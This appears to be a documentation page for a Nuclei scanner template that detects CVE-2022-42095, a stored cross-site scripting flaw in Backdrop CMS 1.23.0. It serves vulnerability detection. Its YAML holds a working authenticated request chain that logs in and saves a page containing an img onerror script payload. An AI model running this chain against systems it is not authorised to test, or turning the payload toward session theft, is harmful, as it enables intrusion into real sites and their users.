Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)
ID: CVE-2022-42095
Severity: medium
Author: theamanrawat
Tags: cve2022,cve,xss,cms,backdrop,authenticated,backdropcms
Description
Section titled “Description”Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Page content.
YAML Source
Section titled “YAML Source”id: CVE-2022-42095
info: name: Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored) author: theamanrawat severity: medium description: | Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Page content. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor. reference: - https://github.com/backdrop/backdrop/releases/tag/1.23.0 - https://github.com/bypazs/CVE-2022-42095 - https://nvd.nist.gov/vuln/detail/CVE-2022-42095 - https://backdropcms.org classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2022-42095 cwe-id: CWE-79 epss-score: 0.00283 epss-percentile: 0.65226 cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:* metadata: verified: true max-request: 5 vendor: backdropcms product: backdrop_cms tags: cve2022,cve,xss,cms,backdrop,authenticated,backdropcms
http: - raw: - | GET /?q=user/login HTTP/1.1 Host: {{Hostname}} - | POST /?q=user/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in - | GET /?q=node/add/page HTTP/1.1 Host: {{Hostname}} - | POST /?q=node/add/page HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
title={{randstr}}&body%5Bund%5D%5B0%5D%5Bsummary%5D=&body%5Bund%5D%5B0%5D%5Bvalue%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E%0D%0A&body%5Bund%5D%5B0%5D%5Bformat%5D=full_html&changed=&form_build_id={{form_id_2}}&form_token={{form_token}}&form_id=page_node_form&status=1&scheduled%5Bdate%5D=2023-04-14&scheduled%5Btime%5D=21%3A00%3A54&name=admin&date%5Bdate%5D=2023-04-13&date%5Btime%5D=21%3A00%3A54&path%5Bauto%5D=1&menu%5Benabled%5D=1&menu%5Blink_title%5D=test&menu%5Bdescription%5D=&menu%5Bparent%5D=main-menu%3A0&menu%5Bweight%5D=0&comment=1&additional_settings__active_tab=&op=Save - | POST /?q={{randstr}} HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - "status_code_5 == 200" - "contains(header_5, 'text/html')" - 'contains(body_5, "<img src=\"x\" onerror=\"alert(document.domain)\" />")' - "contains(body_5, 'Backdrop CMS')" condition: and
extractors: - type: regex name: form_id_1 group: 1 regex: - 'name="form_build_id" value="(.*)"' internal: true
- type: regex name: form_id_2 group: 1 regex: - 'name="form_build_id" value="(.*)"' internal: true
- type: regex name: form_token group: 1 regex: - 'name="form_token" value="(.*)"' internal: true# digest: 4b0a00483046022100a13be2900eed94e546f982243fec695707d1ccc70c7485806a64d2de54a8c017022100dcdf25fbb23cb93e874828b653622d6a9d89692f30b505f0c2b23607369ecf47:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-42095.yaml"